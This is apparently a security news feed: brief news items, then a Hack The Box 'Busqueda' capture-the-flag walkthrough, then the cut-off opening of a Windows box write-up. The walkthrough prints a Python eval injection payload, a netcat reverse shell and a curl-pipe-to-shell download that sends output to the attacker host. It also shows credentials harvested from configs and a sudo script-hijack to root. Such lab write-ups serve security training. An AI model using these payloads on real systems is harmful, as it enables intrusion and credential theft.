Following the success of the Neuro Nostalgia Hackathon that closed out in 2024, Hackathon Raptors has completed its…
Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More
From sophisticated nation-state campaigns to stealthy malware lurking in unexpected places, this week’s cybersecurity landscape is a reminder that attackers are always evolving. Advanced threat groups are exploiting outdated hardware, abusing legitimate tools for financial fraud, and finding new ways to bypass security defenses. Meanwhile, supply chain threats are on the rise, with open-source
The Hacker News – Read More
Cybersecurity researchers are calling attention to an incident in which the popular GitHub Action tj-actions/changed-files was compromised to leak secrets from repositories using the continuous integration and continuous delivery (CI/CD) workflow.
The incident involved the tj-actions/changed-files GitHub Action, which is used in over 23,000 repositories. It’s used to track and retrieve all
The Hacker News – Read More
As duties under the U.K.’s Online Safety Act (OSA) related to tackling illegal content came into force Monday, the internet watchdog, Ofcom, said it has launched a new enforcement program focused on online storage and file-sharing services. The regulator said its evidence shows that file-sharing and file-storage services are “particularly susceptible” to being used for […]
© 2024 TechCrunch. All rights reserved. For personal use only.
Security News | TechCrunch – Read More
The tj-actions/changed-files GitHub Action, which is used in 23,000 repositories, has been targeted in a supply chain attack.
The post Popular GitHub Action Targeted in Supply Chain Attack appeared first on SecurityWeek.
SecurityWeek – Read More
Frankfurt am Main, Germany, 17th March 2025, CyberNewsWire
Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More
A broad coalition drawn from across the ranks of Europe’s tech industry is calling for “radical action” from European Union lawmakers to shrink reliance on foreign-owned digital infrastructure and services to bolster the bloc’s economic prospects, resilience, and security in increasingly fraught geopolitical times. In an open letter to European Commission president, Ursula von der […]
© 2024 TechCrunch. All rights reserved. For personal use only.
Security News | TechCrunch – Read More
After a decade of publishing your favorite infosec articles, we are very proud to announce SecjuiceCON 2025, our very first virtual conference. The first Secjuice conference is an online event for infosec and osint industry insiders, and we’d love for you to talk to our audience about your wisdom and learnings.
You might already know about our work, but Secjuice is the only non-profit, independent, and volunteer-led publication in the information security space. We are a private members’ writing club focused on cybersecurity, information security, hacking, and open-source intelligence gathering.
We believe that our value as professionals lies in our ability to share our research and knowledge with others through the written word. We mentor hackers and help them prepare their research for publication. Our members feel a strong sense of civic duty; it’s what drives us to spread our knowledge and experiences with our community. Defending the interests of those who hack is within our remit.
Mark it on your calendar!
Sunday, March 30, 2025
12 PM Eastern Daylight Savings Time (EDT)
4 PM Coordinated Universal Time (UTC)
YouTube Premier Video
https://www.youtube.com/@secjuice
The schedule uses the America/New_York or Eastern Daylight Savings time zone.
The schedule is tentative and subject to change.
No drama, no hostility, maintain civility, or else.
We thank the following sponsors.
Gold Sponsors
Bronze Sponsors
We are still accepting sponsorships.
Please email conference at secjuice dot com to get more details!!
Secjuice – Read More
As usual, a nice and simple BOX with two relatively simple exploits even for beginners. Let’s go.
The nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 15:08 EDT
Nmap scan report for 10.10.11.208
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds
port 80 responds to the “searcher.htb” domain. Put it in the /etc/hosts file.
It seems to be a search engine collector.
Wappalyzer reports python (3.10.6) and flask (2.1.2) technology.
The portal is based on version 2.4.0 of an open-source project called Searchor with the repository on git
ArjunShardaSearching for exploits I found this:
Intercepting the calls using BurpSuite, I retrieve the request:
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test
Let’s try to investigate the code in the repository, crossing the information of the eval reported in the vulnerability and the request towards the /search routing. Download the 2.4.0 version of the source code (https://github.com/ArjunSharda/Searchor/releases/tag/v2.4.0).
Search the POST method…
def search(engine, query, open, copy):
try:
url = eval(
f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
)
click.echo(url)
searchor.history.update(engine, query, url)
if open:
click.echo("opening browser...")
if copy:
click.echo("link copied to clipboard")
except AttributeError:
print("engine not recognized")
…and the Engine class:
class Engine(Enum):
Accuweather = "https://www.accuweather.com/en/search-locations?query={query}"
AlternativeTo = "https://alternativeto.net/browse/search/?q={query}"
Amazon = "https://www.amazon.com/s?k={query}"
AmazonWebServices = "https://aws.amazon.com/search/?searchQuery={query}"
AOL = "https://search.aol.com/aol/search?q={query}"
Apple = "https://www.apple.com/search/{query}"
[...]
Apparently, you can run some python code, it will be easier using the last parameter (open). Sniffing the request setting the “Auto redirect” check with BurpSuite…
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test&auto_redirect=
It seems that the backend code only checks for the presence of the parameter, so I can’t take advantage of the “auto_redirect” parameter, I’ll have to use the “query” parameter. The purpose is to pass a value such that a command is executed in addition to the original one. Starting from the construction of the original string, then
f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
we have to close the string at the point of the query parameter. Just pass the value as the query value
test')#
This will terminate the string with the single quote, close the search command with the closing parenthesis, and comment out everything that follows.
Since the search of the engine class accepts the remaining parameters with default values, there will be no problems, as the search method in this case will be launched specifying only the first parameter.
def search(self, query, open_web=False, copy_url=False, additional_queries: dict = None):
url = self.value.format(query=quote(query, safe=""))
if additional_queries:
url += ("?" if "?" not in self.value.split("/")[-1] else "&") + "&".join(
query + "=" + quote(query_val)
for query, query_val in additional_queries.items()
)
if open_web is True:
open_new_tab(url)
if copy_url is True:
pyperclip.copy(url)
return url
But now I have to try to inject the code I want to execute, but failing to concatenate another string, I take advantage of a trick that allows me to execute some code through the use of the format of a string. The output of the search command of the Engine class still returns a string, on which I can perform a format. Since there are no variable markers, the format will have no effect, but it will still allow me to execute some code. As usual, to test, I’ll run a curl to my listening machine to see if the injection was successful. The query parameter will then look something like this:
test').format(__import__('os').popen('curl%20http://10.10.14.151').read())#
By replacing the parameter on the BurpSuite and launching the request, the surprise is not long in coming.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.151:80
[Sun Apr 30 17:34:23 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 Accepted
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 [404]: GET / - No such file or directory
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 Closing
Perfect, it works, let’s convert curl to a reverse shell and activate our listener.
test').format(__import__('os').popen('rm%20-f%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%2010.10.14.151%204444%20>/tmp/f').read())#
The BurpSuite will do the rest!
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.151] from searcher.htb [10.10.11.208] 37746
/bin/sh: 0: can't access tty; job control turned off
$ whoami
svc
Navigate to the home folder and let’s find out he’s the user with the flag.
$ cat user.txt
f******************************2Spawned a tty shell to test the sudo command but this user cannot launch sudo without a password. So, launch linpeas as usual, without leaving any trace.
Download linpeas and start the php native web server.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
--2023-05-01 15:22:07-- https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-01 15:22:08-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 830030 (811K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================================================================================================>] 810.58K --.-KB/s in 0.1s
2023-05-01 15:22:09 (5.56 MB/s) - ‘linpeas.sh’ saved [830030/830030]
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ php -S 10.10.14.151:80
[Mon May 1 15:22:12 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started
Then start the netcat listener that will receive the scan output.
nc -lp 4445 | tee lpeasout.file
And finally, launch the attack on the remote machine.
$ curl http://10.10.14.151/linpeas.sh | sh | nc 10.10.14.151 4445
curl http://10.10.14.151/linpeas.sh | sh | nc 10.10.14.151 4445
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
49 810k 49 404k 0 0 16872 0 0:00:49 0:00:24 0:00:25 16873uniq: write error: Broken pipe. . . . . . . . . . . . . . . . . . . . . . . . . . . .
62 810k 62 504k 0 0 19232 0 0:00:43 0:00:26 0:00:17 19233cat: write error: Broken pipe
cat: write error: Broken pipe
sed: -e expression #1, char 0: no previous regular expression
100 810k 100 810k 0 0 7119 0 0:01:56 0:01:56 --:--:-- 5756
sh: 3672: [: not found
uniq: write error: Broken pipe
grep: write error: Broken pipe
grep: write error: Broken pipe
sh: 5415: Syntax error: Unterminated quoted string
Let the scan complete (check your netcat session).
[...]
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec 1 18:45 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ProxyPreserveHost On
ServerName searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:5000/
ProxyPassReverse / http://127.0.0.1:5000/
RewriteEngine On
RewriteCond %{HTTP_HOST} !^searcher.htb$
RewriteRule /.* http://searcher.htb/ [R]
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ProxyPreserveHost On
ServerName gitea.searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:3000/
ProxyPassReverse / http://127.0.0.1:3000/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
[...]
-rw-rw-r-- 1 svc svc 76 Apr 3 08:58 /home/svc/.gitconfig
[user]
email = cody@searcher.htb
name = cody
[core]
hooksPath = no-hooks
[...]
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
lrwxrwxrwx 1 root root 33 Dec 21 19:13 /etc/systemd/system/sockets.target.wants/docker.socket -> /lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 175 Jan 3 18:47 /usr/lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 477 Jun 15 2022 /usr/local/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml
-rw-r--r-- 1 root root 0 Dec 21 19:13 /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
[...]
Found an additional domain (gitea.searcher.htb), insert it on the /etc/hosts file and try to navigate.
Gitea Version: 1.18.0+rc1
Searching for some exploit, I find something (even an RCE), but be being authenticated. After some more searching, I can’t find anything of interest, so, convinced that the next clue has something to do with git anyway, I search the repositories available in this BOX.
$ find / -name ".git" 2>/dev/null
find / -name ".git" 2>/dev/null
/var/www/app/.git
/opt/scripts/.git
After searching the repository a bit, without much success, and not knowing exactly how to proceed, I start searching online and come across an interesting article.
$ cat .git/config
cat .git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
It seems that I have found what I was looking for and finally can access the gitea portal. So, I can come back on one of the previous exploits that need credentials.
p0daliriusUnfortunately I can’t even create a new repository. Anyway, I can connect via ssh using the password.
$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
use_pty
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
Even though I can run it, I can’t read it.
$ cat /opt/scripts/system-checkup.py
cat /opt/scripts/system-checkup.py
cat: /opt/scripts/system-checkup.py: Permission denied
So, try to execute.
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 4 months ago Up 8 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 4 months ago Up 8 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
I’ll probably have to use the docker command to elevate the privileges, but in the meantime let’s collect as much information as possible about the running containers as well.
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
{"Id":"960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb","Created":"2023-01-06T17:26:54.457090149Z","Path":"/usr/bin/entrypoint","Args":["/bin/s6-svscan","/etc/s6"],"State":{"Status":"running","Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":1828,"ExitCode":0,"Error":"","StartedAt":"2023-05-10T11:20:05.014741291Z","FinishedAt":"2023-04-04T17:03:01.71746837Z"},"Image":"sha256:6cd4959e1db11e85d89108b74db07e2a96bbb5c4eb3aa97580e65a8153ebcc78","ResolvConfPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/resolv.conf","HostnamePath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/hostname","HostsPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/hosts","LogPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb-json.log","Name":"/gitea","RestartCount":0,"Driver":"overlay2","Platform":"linux","MountLabel":"","ProcessLabel":"","AppArmorProfile":"docker-default","ExecIDs":null,"HostConfig":{"Binds":["/etc/timezone:/etc/timezone:ro","/etc/localtime:/etc/localtime:ro","/root/scripts/docker/gitea:/data:rw"],"ContainerIDFile":"","LogConfig":{"Type":"json-file","Config":{}},"NetworkMode":"docker_gitea","PortBindings":{"22/tcp":[{"HostIp":"127.0.0.1","HostPort":"222"}],"3000/tcp":[{"HostIp":"127.0.0.1","HostPort":"3000"}]},"RestartPolicy":{"Name":"always","MaximumRetryCount":0},"AutoRemove":false,"VolumeDriver":"","VolumesFrom":[],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"private","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"private","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":67108864,"Runtime":"runc","ConsoleSize":[0,0],"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":null,"BlkioDeviceReadBps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteIOps":null,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":null,"DeviceCgroupRules":null,"DeviceRequests":null,"KernelMemory":0,"KernelMemoryTCP":0,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":null,"OomKillDisable":null,"PidsLimit":null,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware"],"ReadonlyPaths":["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"]},"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34-init/diff:/var/lib/docker/overlay2/bd9193f562680204dc7c46c300e3410c51a1617811a43c97dffc9c3ee6b6b1b8/diff:/var/lib/docker/overlay2/df299917c1b8b211d36ab079a37a210326c9118be26566b07944ceb4342d3716/diff:/var/lib/docker/overlay2/50fb3b75789bf3c16c94f888a75df2691166dd9f503abeadabbc3aa808b84371/diff:/var/lib/docker/overlay2/3668660dd8ccd90774d7f567d0b63cef20cccebe11aaa21253da056a944aab22/diff:/var/lib/docker/overlay2/a5ca101c0f3a1900d4978769b9d791980a73175498cbdd47417ac4305dabb974/diff:/var/lib/docker/overlay2/aac5470669f77f5af7ad93c63b098785f70628cf8b47ac74db039aa3900a1905/diff:/var/lib/docker/overlay2/ef2d799b8fba566ee84a45a0070a1cf197cd9b6be58f38ee2bd7394bb7ca6560/diff:/var/lib/docker/overlay2/d45da5f3ac6633ab90762d7eeac53b0b83debef94e467aebed6171acca3dbc39/diff","MergedDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/merged","UpperDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/diff","WorkDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/work"},"Name":"overlay2"},"Mounts":[{"Type":"bind","Source":"/root/scripts/docker/gitea","Destination":"/data","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"bind","Source":"/etc/localtime","Destination":"/etc/localtime","Mode":"ro","RW":false,"Propagation":"rprivate"},{"Type":"bind","Source":"/etc/timezone","Destination":"/etc/timezone","Mode":"ro","RW":false,"Propagation":"rprivate"}],"Config":{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}},"NetworkSettings":{"Bridge":"","SandboxID":"576957ba1f33c882828ded9fba9c24391773af2cc643a05e04a6965a95796655","HairpinMode":false,"LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"Ports":{"22/tcp":[{"HostIp":"127.0.0.1","HostPort":"222"}],"3000/tcp":[{"HostIp":"127.0.0.1","HostPort":"3000"}]},"SandboxKey":"/var/run/docker/netns/576957ba1f33","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null,"EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","MacAddress":"","Networks":{"docker_gitea":{"IPAMConfig":null,"Links":null,"Aliases":["server","960873171e2e"],"NetworkID":"cbf2c5ce8e95a3b760af27c64eb2b7cdaa71a45b2e35e6e03e2091fc14160227","EndpointID":"9cf85d867982a52a948f0346fa13fbe87bd2244ef427973aa671a2a76cb92b3f","Gateway":"172.19.0.1","IPAddress":"172.19.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:13:00:02","DriverOpts":null}}}}
And the environment variables section is really cool.
[...]
"Env":[
"USER_UID=115",
"USER_GID=121",
"GITEA__database__DB_TYPE=mysql",
"GITEA__database__HOST=db:3306",
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"USER=git",
"GITEA_CUSTOM=/data/gitea"
],
[...]
Obviously, the environment section of the second container is equally attractive.
[...]
"Env":[
"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
"MYSQL_USER=gitea",
"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
"MYSQL_DATABASE=gitea",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"GOSU_VERSION=1.14",
"MYSQL_MAJOR=8.0",
"MYSQL_VERSION=8.0.31-1.el8",
"MYSQL_SHELL_VERSION=8.0.31-1.el8"
],
[...]
Passwords don’t seem, in any case, to be useful. Since the script appeared to use the docker command anyway, I tried hard to exploit that, trying passing additional commands and injecting alternative commands, but without success. Then I took a look at the folder where the script is located and found a couple of interesting clues.
-bash-5.1$ ls -la /opt/scripts/
total 28
drwxr-xr-x 3 root root 4096 Dec 24 18:23 .
drwxr-xr-x 4 root root 4096 Mar 1 10:46 ..
-rwx--x--x 1 root root 586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root 857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr 3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24 21:23 system-checkup.py
Inside the folder is a script named after the third argument that takes the original script and there appears to be a git repository. However, I don’t have permission to read the files inside, but let’s try to proceed on this new path.
-bash-5.1$ git status
fatal: not a git repository (or any of the parent directories): .git
-bash-5.1$ ls -la .git
ls: cannot open directory '.git': Permission denied
The git repository route is to be abandoned; the script file remains.
-bash-5.1$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[=] Docker conteainers
{
"/gitea": "running"
}
{
"/mysql_db": "running"
}
[=] Docker port mappings
{
"22/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "222"
}
],
"3000/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "3000"
}
]
}
[=] Apache webhosts
[+] searcher.htb is up
[+] gitea.searcher.htb is up
[=] PM2 processes
┌─────┬────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id │ name │ namespace │ version │ mode │ pid │ uptime │ ↺ │ status │ cpu │ mem │ user │ watching │
├─────┼────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0 │ app │ default │ N/A │ fork │ 1655 │ 28h │ 0 │ online │ 0% │ 31.0mb │ svc │ disabled │
└─────┴────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘
[+] Done!
Oh oh… the command that didn’t work before now seems to execute correctly, so it runs a script with that name contained in the folder you are in!
-bash-5.1$ echo -e '#!/bin/bashncat /root/root.txt' > full-checkup.sh && chmod +x full-checkup.sh && sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
d24d04fb75637b25c945648390008608
[+] Done!
And after a few simple tries, we have our root flag!
That’s all folks, as usual, see you at the next BOX, have an excellent hacking (in legal), bye.
Secjuice – Read More
A very particular windows machine, in which I got stuck, stubbornly looking for an exploit which later turned out to be a simple clue left in plain sight that allowed a very trivial privesc. More challenging, but almost standard, the second privec which then led me to the desired root flag.
Let’s start with the nmap scan.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
